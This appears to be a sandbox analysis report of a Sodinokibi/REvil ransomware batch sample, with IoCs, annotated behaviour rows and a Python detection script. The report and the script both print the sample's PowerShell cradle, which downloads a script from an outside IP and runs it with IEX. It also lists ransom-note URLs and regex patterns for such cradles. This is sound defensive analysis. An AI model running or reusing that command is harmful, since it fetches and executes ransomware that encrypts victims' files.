Analysis

max time kernel: 150s
max time network: 152s
platform: windows10_x64
resource: win10v200722
submitted: 01-09-2020 20:10
Static task: static1
Behavioral task: behavioral1
  Sample: 484333e52a633dd4ddba453c88728166.bat
  Resource: win7
Behavioral task: behavioral2
  Sample: 484333e52a633dd4ddba453c88728166.bat
  Resource: win10v200722
General

Target: 484333e52a633dd4ddba453c88728166.bat
Size: 220B
MD5: 78a20a9e11dcafee6975c27337f224f6
SHA1: bf2f2d540d8c622f2c35950b2517e06bd1ffa085
SHA256: bdb3f36c480f19ec8d2aa9a181d0f606f53586ba44e2065be4b5a94cc4460913
SHA512: 206fdef2f70c68a78c5a261d15e795faf814384a3124f9dc149ce215eb15e9b2fb7dea1aef79183228a5af6d014bd3dc6cacaaab6b9cbeaf81d95475406717ab
Malware Config

Extracted
  http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166
  (The 32-hex path component is the sample's filename, not its MD5, which is 78a20a9e11dcafee6975c27337f224f6; pivot on it as a paste ID, not as a file hash.)

Extracted
  Path: C:\19887099q-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0CFA7B45EE3878
    http://decryptor.cc/CA0CFA7B45EE3878
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request  (38 IoCs)
Processes:
flow | pid  | process
10   | 3944 | powershell.exe
17   | 3944 | powershell.exe
19   | 3944 | powershell.exe
21   | 3944 | powershell.exe
24   | 3944 | powershell.exe
26   | 3944 | powershell.exe
28   | 3944 | powershell.exe
30   | 3944 | powershell.exe
32   | 3944 | powershell.exe
34   | 3944 | powershell.exe
37   | 3944 | powershell.exe
39   | 3944 | powershell.exe
40   | 3944 | powershell.exe
42   | 3944 | powershell.exe
44   | 3944 | powershell.exe
46   | 3944 | powershell.exe
48   | 3944 | powershell.exe
50   | 3944 | powershell.exe
52   | 3944 | powershell.exe
54   | 3944 | powershell.exe
56   | 3944 | powershell.exe
58   | 3944 | powershell.exe
60   | 3944 | powershell.exe
62   | 3944 | powershell.exe
64   | 3944 | powershell.exe
66   | 3944 | powershell.exe
68   | 3944 | powershell.exe
70   | 3944 | powershell.exe
72   | 3944 | powershell.exe
74   | 3944 | powershell.exe
76   | 3944 | powershell.exe
79   | 3944 | powershell.exe
81   | 3944 | powershell.exe
83   | 3944 | powershell.exe
85   | 3944 | powershell.exe
87   | 3944 | powershell.exe
89   | 3944 | powershell.exe
90   | 3944 | powershell.exe
All 38 flows come from PID 3944, the 32-bit powershell.exe that cmd.exe launched. The report does not name a destination per flow; the only URL in the command line is the paste host http://185.103.242.78, so the individual destinations have to be taken from the pcap, not from this table.
Modifies extensions of user files  (2 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes:
description                  | ioc                                                                                               | process
File opened for modification | \??\c:\users\admin\pictures\SplitMerge.tiff                                                       | powershell.exe
File renamed                 | C:\Users\Admin\Pictures\SplitMerge.tiff => \??\c:\users\admin\pictures\SplitMerge.tiff.19887099q | powershell.exe
Enumerates connected drives  (3 TTPs)
Modifies service  (2 TTPs, 5 IoCs)
Processes:
description | ioc                                                                                                        | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                                   | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                                 | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                                        | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer                   | vssvc.exe
These are the VSS writer diagnostic keys that vssvc.exe itself creates when the Volume Shadow Copy service starts. They show the service was started during the run, which is consistent with the payload touching shadow copies, but the report records no shadow copy enumeration or deletion command, so that step is not evidenced here.
Sets desktop wallpaper using registry  (2 TTPs, 1 IoCs)
Processes:
description     | ioc                                                                                                                                                                  | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6t1wmxq8d123z.bmp" | powershell.exe
Drops file in Program Files directory  (15 IoCs)
Processes:
description                  | ioc                                           | process
File created                 | \??\c:\program files\19887099q-readme.txt       | powershell.exe
File created                 | \??\c:\program files (x86)\19887099q-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ResetUnblock.emz           | powershell.exe
File opened for modification | \??\c:\program files\CompleteRedo.3gp           | powershell.exe
File opened for modification | \??\c:\program files\EnterUnlock.xltm           | powershell.exe
File opened for modification | \??\c:\program files\NewCompare.M2T             | powershell.exe
File opened for modification | \??\c:\program files\ReadGroup.tif              | powershell.exe
File opened for modification | \??\c:\program files\SetPing.docx               | powershell.exe
File opened for modification | \??\c:\program files\UnprotectFind.txt          | powershell.exe
File opened for modification | \??\c:\program files\SearchMeasure.csv          | powershell.exe
File opened for modification | \??\c:\program files\ConvertFromGet.xltm        | powershell.exe
File opened for modification | \??\c:\program files\EnableRemove.docx          | powershell.exe
File opened for modification | \??\c:\program files\FormatGroup.emz            | powershell.exe
File opened for modification | \??\c:\program files\FormatGroup.wps            | powershell.exe
File opened for modification | \??\c:\program files\UnprotectFind.vssm         | powershell.exe
Drops file in Windows directory  (1 IoCs)
Processes:
description                  | ioc                                                           | process
File opened for modification | C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat | svchost.exe
Modifies data under HKEY_USERS  (6 IoCs)
Processes:
description      | ioc                                                                                                                                    | process
Set value (int)  | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1"    | svchost.exe
Set value (data) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = d8301124ac80d601 | svchost.exe
Set value (int)  | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0"          | svchost.exe
Key created      | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad                                               | svchost.exe
Key created      | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections                                        | svchost.exe
Key created      | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7                             | svchost.exe
All six entries are written by svchost.exe -k LocalService -s WinHttpAutoProxySvc (PID 628) under S-1-5-19 (LOCAL SERVICE). They are WinHTTP's WPAD proxy auto-detection state, consistent with the WebClient download from PID 3944 going through the default proxy resolver; they are a side effect of the cradle, not attacker-written persistence.
Suspicious behavior: EnumeratesProcesses  (5 IoCs)
Processes:
pid  | process
3944 | powershell.exe
3944 | powershell.exe
3944 | powershell.exe
3944 | powershell.exe
3944 | powershell.exe
Suspicious use of AdjustPrivilegeToken  (8 IoCs)
Processes:
description                      | pid  | process
Token: SeShutdownPrivilege       | 628  | svchost.exe
Token: SeCreatePagefilePrivilege | 628  | svchost.exe
Token: SeDebugPrivilege          | 3944 | powershell.exe
Token: SeDebugPrivilege          | 3944 | powershell.exe
Token: SeTakeOwnershipPrivilege  | 3944 | powershell.exe
Token: SeBackupPrivilege         | 3084 | vssvc.exe
Token: SeRestorePrivilege        | 3084 | vssvc.exe
Token: SeAuditPrivilege          | 3084 | vssvc.exe
The powershell.exe rows are the payload enabling SeDebugPrivilege and SeTakeOwnershipPrivilege in its own token; the svchost.exe and vssvc.exe rows are privileges those services enable in normal operation.
Suspicious use of WriteProcessMemory  (3 IoCs)
Processes:
description | pid  | process | target process
PID 3888 wrote to memory of 3944 | 3888 | cmd.exe | powershell.exe
PID 3888 wrote to memory of 3944 | 3888 | cmd.exe | powershell.exe
PID 3888 wrote to memory of 3944 | 3888 | cmd.exe | powershell.exe
All three writes are from cmd.exe into the powershell.exe child it is creating, which is typical of a parent launching a child; the report shows no write into an unrelated process, so this is not evidence of injection.
Processes

C:\Windows\system32\cmd.exe  (PID 3888)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\484333e52a633dd4ddba453c88728166.bat"
  - Suspicious use of WriteProcessMemory
  |
  +-- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 3944)
        Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166');Invoke-ZRFBQPCGMEHHZ;Start-Sleep -s 10000"
        - Blacklisted process makes network request
        - Modifies extensions of user files
        - Sets desktop wallpaper using registry
        - Drops file in Program Files directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\svchost.exe  (PID 628)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe  (PID 3084)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken

Chain: the 220-byte .bat amounts to the single powershell.exe command line shown. It fetches the script body from the paste URL with System.Net.WebClient.DownloadString, executes it in memory with IEX, calls Invoke-ZRFBQPCGMEHHZ (a randomised name, presumably defined by the downloaded script) and then sleeps for 10000 seconds so the host process stays alive while that function runs. Every encryption side effect in this report (the .19887099q renames, the 19887099q-readme.txt drops, the wallpaper change, the 38 network flows) is attributed to that one PID 3944, so no second-stage binary was written to disk. The 32-bit host under SysWOW64 is used even though the platform is x64. svchost.exe (WinHttpAutoProxySvc) and vssvc.exe are separate roots in the tree, not children of cmd.exe; their activity is consistent with proxy auto-detection for the download and with the Volume Shadow Copy service being started during the run.
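An added example, not part of the sandbox report and not code from the sample or the sandbox vendor, of how the entries above can be turned into detection logic: it flags the PowerShell download cradle in the cmd.exe child's command line (an in-memory execution primitive combined with a network fetch), extracts the paste URL and the randomised Invoke-* function name, and scans file events for one process appending the same new extension to several files together with the matching <ext>-readme.txt note that this family drops. The event dictionaries are constructed for the example from the report's process, rename and file-create rows; the two extra renames beyond the one the report lists and the benign rename by PID 1234 are invented to exercise the threshold and the negative case, and EVENTS, analyze_cmdline, detect_mass_rename, ransom_notes and triage are names chosen here.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed events modelled on the report above (not sandbox output). The renames of
# Budget.xlsx and Mix.mp3 and the benign rename by PID 1234 are invented for the example.
EVENTS = [
    {"type": "process", "pid": 3944, "ppid": 3888,
     "cmdline": r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166');Invoke-ZRFBQPCGMEHHZ;Start-Sleep -s 10000"'''},
    {"type": "rename", "pid": 3944, "src": r"C:\Users\Admin\Pictures\SplitMerge.tiff",
     "dst": r"\??\c:\users\admin\pictures\SplitMerge.tiff.19887099q"},
    {"type": "rename", "pid": 3944, "src": r"C:\Users\Admin\Documents\Budget.xlsx",
     "dst": r"C:\Users\Admin\Documents\Budget.xlsx.19887099q"},
    {"type": "rename", "pid": 3944, "src": r"C:\Users\Admin\Music\Mix.mp3",
     "dst": r"C:\Users\Admin\Music\Mix.mp3.19887099q"},
    {"type": "create", "pid": 3944, "path": r"C:\Program Files\19887099q-readme.txt"},
    {"type": "rename", "pid": 1234, "src": r"C:\Users\Admin\report.docx",
     "dst": r"C:\Users\Admin\report.bak"},
]

# A cradle needs both halves: something that runs text as code and something that fetches it.
EXEC_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
DOWNLOAD_RE = re.compile(r"(?i)downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")
URL_RE = re.compile(r"https?://[^\s'\"();]+")
INVOKE_RE = re.compile(r"(?i)\binvoke-[a-z0-9]+")
CMDLETS = {"invoke-expression", "invoke-webrequest"}  # built-ins, not script-defined functions


def analyze_cmdline(cmdline):
    """Return None if the command line is not a download cradle, otherwise the URLs,
    hosts, script-defined Invoke-* calls and whether the 32-bit (SysWOW64) host ran it."""
    if not (EXEC_RE.search(cmdline) and DOWNLOAD_RE.search(cmdline)):
        return None
    urls = URL_RE.findall(cmdline)
    invoked = [f for f in INVOKE_RE.findall(cmdline) if f.lower() not in CMDLETS]
    return {
        "urls": urls,
        "hosts": [urlparse(u).hostname for u in urls],
        "invoked_functions": invoked,
        "wow64": "syswow64" in cmdline.lower(),
    }


def _norm(path):
    # Sandbox rows mix NT object-manager paths (prefix "\??\") with Win32 paths and
    # differ in case; fold both into one comparable form.
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def detect_mass_rename(events, min_files=3):
    """Per PID, count renames that keep the whole original name and append one new
    extension (SplitMerge.tiff -> SplitMerge.tiff.19887099q). A PID that appends the
    same extension to at least min_files files is reported with that extension."""
    per_pid = {}
    for e in events:
        if e["type"] != "rename":
            continue
        src, dst = _norm(e["src"]), _norm(e["dst"])
        if not dst.startswith(src + "."):
            continue  # ordinary extension change or move, not an appended marker
        ext = dst[len(src) + 1:]
        if not ext or any(c in ext for c in "\\/."):
            continue
        per_pid.setdefault(e["pid"], Counter())[ext] += 1
    return [{"pid": pid, "extension": ext, "files": n}
            for pid, counts in per_pid.items()
            for ext, n in counts.items() if n >= min_files]


def ransom_notes(events, extensions):
    """Match created files against the <extension>-readme.txt naming used here
    (19887099q-readme.txt beside .19887099q files)."""
    hits = []
    for e in events:
        if e["type"] != "create":
            continue
        name = _norm(e["path"]).rsplit("\\", 1)[-1]
        for ext in extensions:
            if name == f"{ext}-readme.txt":
                hits.append((ext, e["path"]))
    return hits


def triage(events):
    """Run the three checks and return the indicators an analyst would pivot on."""
    cradle = None
    for e in events:
        if e["type"] == "process":
            hit = analyze_cmdline(e["cmdline"])
            if hit:
                cradle = dict(hit, pid=e["pid"], ppid=e["ppid"])
                break
    renames = detect_mass_rename(events)
    notes = ransom_notes(events, [r["extension"] for r in renames])
    return {"cradle": cradle, "mass_rename": renames, "ransom_notes": notes}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(EVENTS), indent=2))
```

The rename check deliberately requires the original name to survive intact with a suffix appended, which separates an encryptor's marker extension from a user saving a .docx as .bak; the threshold of three files is low enough to fire early in a run but should be tuned against the volume of legitimate renames in the environment being monitored.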